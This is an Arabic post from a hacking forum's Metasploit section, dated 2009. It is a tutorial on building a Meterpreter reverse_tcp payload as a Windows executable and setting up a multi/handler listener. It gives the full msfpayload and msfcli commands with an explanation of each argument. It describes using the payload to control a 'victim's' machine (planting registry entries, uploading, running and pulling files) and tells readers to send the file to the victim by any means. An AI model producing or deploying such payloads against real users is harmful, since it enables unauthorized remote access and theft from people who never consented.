التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-30-2009, 08:10 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي [الدرس السادس] صناعة بايلود Meterpreter


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة

مدري طولت عليم بالدرس السادس لكن ظروف وامتحانات ... الله بعين .... الحمد لله وشكر لله
درسنا اليوم يكون عن صناعة بايلود اسمه Meterpreter وانا اعتبره من اقوى وافضل البايلود من بين البايلودات الاخرى والاغلب يعتبره قوية لانه قوية :D
ما قوي الا الله

يستعمل هذا البايلود بعد صناعته بأمتداد exe او pl في التحكم بجهاز الضحية ببعض الاوامر الذي يكون الامر يحل محل امر قوي كأمر زرع ريجستري ..واو ... وامر رفع ملف لجهاز الضحية وتشغيله وسحب ملف و و و

ان شاء الله بهل الاكمن يوم ادرجها لكم ...
الدرس فيديو لكن شرحته كتابي وبأمكانك ايضا تحميله يعني فيديو + كتابي لأصحاب النت الضعيفة

نبدأ الدرس
ملاحظة: هنا سنستخدم CMd shell في الميتاسبلويت وليس msfweb يعني ليس الرابط الذي تشعه بالمتصفح 127.0.0.1:55555
اول شيء نفتحه عن طريق ابدأ >> البرامج >>> Metasploit 3 >>> الكومند شيل CMD shell
نبدأ الدرس بأول امر وهو

كود PHP:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 X >"C:\"vbspiders.exe 
الكود اول مرة تشوفونه للذين يتعلمون الميتا جديدا

هناك شروحات عن صناعة هذا ويشبه الشرح لكن هناك تطبيق دون فهم اي شيء منها يعني فيك تقول الفيديوهات عن هذه البايلود منقول لكن يختلف مقدم الفيديو .. انا وضعته لكي لا حد يتسائل
الآن الشرح الفيديو لي انا

مش هذا موضوعنا نبدأ بالشرح

ruby : كلمة تبدأ بها في اي شيء تستخدمه عن طريق CMD shell يكون بدايته ruby هذا ما نختلف عليه سواء كنت تستخدم msfcli سوف تكتب اول كلمة وهي ruby

msfpayload : تستخدم في في اسخدام بايلود نحن في هذه الحالة نستخدم صناعة بايلود وليس استخدام ثغرة .ز لو كان ثغرة كا وضعنا msfcli وجزء msf هو اساسي تضعه في البداية وبعدها النوع

windows/meterpreter/reverse_tcp : وهي اسم بايلود الميتر بريتر يعني ... نيجي لآخر مقطع reverse_tcp تستخدم في الاتصال العكسي مفيد في تخطي الجدار الناري وبأمكانكم وضع bind_tcp اذا كنت متأكد من البورت مفتوح .. لكن يفضل وضع اتصال عكسي ..... مش واحد ييجي ويقول بدي اضع الاثنين .. لكي اذا لم يزبط اتصال عكسي يجرب تلقائئي اتصال مباشر ويكون امره bind_tcp+reverse_tcp خخخخ <<< خخخ هذا غلط يا اخوان اما عكسي او مباشر ... واسم البايلود موجود بلميتا عن طريق وضع امر show payloads بتحصل هذه البايلود

LHOST : الكل يعرفها اذا تابع دروسي من اولها وهي لأختيار اي بي جهازك الذي تريد وصول التبليغ عليه يعني بأختصار تضع اي بي جهازك المحلي
LPORT : البورت الذي تريد استخدامه في الثغرة ويلزم يكون مفتوح بالراوتر

X : لصناعة البايلود بأمتداد exe اي تنفيذي وان شئت بأمكانك وضع P بدل X فيصنع البايلود بأمتداد بيرل لكن يلزم تعدل على الامتددا بوضع meter.pl

> : تستخدم لتشير الى وضعه بالمسار كذا يعني يتبعها المسار

"C:\"vbspiders.exe : هذا هو المسار لكن يحصر المسار بين علامتي تنصيص " وبعدها تكتب الاسم وبأمكانك وضع اي اسم تريد ولا يشترط هذا الاسم فقط
الآن نضغط انتر وننتظر الصناعة ورح يتم صناعتة بالمسار C وبحجم 9.50 كيلو بايت

الآن نريد نتصنت عليها بثغة تصنت بالميتا ويكون الامر هكذا

كود PHP:
ruby msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 E 
نشرح الامر
اول شيء
ruby : شرحناه فوق
msfcli : لأستخدام ثغرة << في هذه المر ثغرة وليس بايلود فنستخدم بالثغرات msfcli

بعدها يتبعها اسم الثغرة التصنت وهي multi/handler هي بالحقيقة لا تعتبر بأس ثغرة وانما بأسم اداة كالنت كات لكن هذه مخصصة فقط للتصنت على ثغرات الميت فقط

PAYLOAD= : وضع اسم البايلود التي نريد استخدامه يجب وضع اسم البايلود الذي نريد استخدامه حسب الذي تم صناعته من قبلك

يعني الامر كما هو موضح

PAYLOAD=windows/meterpreter/reverse_tcp

الخلاصة انك تضع اسم البايلود الذي تريد التصنت عليه

LHOST=192.168.1.1 : الاي بي الذي وضعناه في اعدادات صناعة البايلود وانت استبدله بأي بي ججهازك المحلي

LPORT=9999 : البورت الذي وضعناه في اعدادات الثغرة واستبدله بالبورت الذي تريد على حسب ما تم وضعه في ثغرتك

ولا تسوا حرف E لانه لن يتم عمل الثغرة الا بعد وضع هذا الحرف

الآن نضغط انتر وننتظر

الآن هيك تم الصناعة والتصنت يبقى ارسالة للضحية بأي طريقة تريدها ...
جربه على نفسك لكي تعتاد عليه

موفقين شباب
الى الامام بعون الله


هذا رابط الفيديو واشوفه اشمل وافضل من الكتابة لأنكم اول مرة للي يمرون عليه
Download
اي استفسار او شيء اناا جاهز

#####
تحياتي
لا للاحتكار
المجهوول


Fhg]vs hgsh]sD wkhum fhdg,] Meterpreter


التعديل الأخير تم بواسطة المجهووول ; 10-03-2009 الساعة 02:20 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[الدرس السابع] صناعة بايلود الـ reflectivedllinject المجهووول MetaSploit 15 03-10-2018 08:16 PM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 2 : screenshot/keylogging data$hack MetaSploit 100 02-03-2011 05:42 AM
[الدرس الثامن] صناعة بايلود vncinject المجهووول MetaSploit 12 11-26-2010 08:02 PM
python:payloadgen صناعة بايلود المجهووول Tools forum 6 09-18-2010 07:28 PM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 4 : Metsvc data$hack MetaSploit 40 07-22-2010 11:20 AM


الساعة الآن 03:28 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0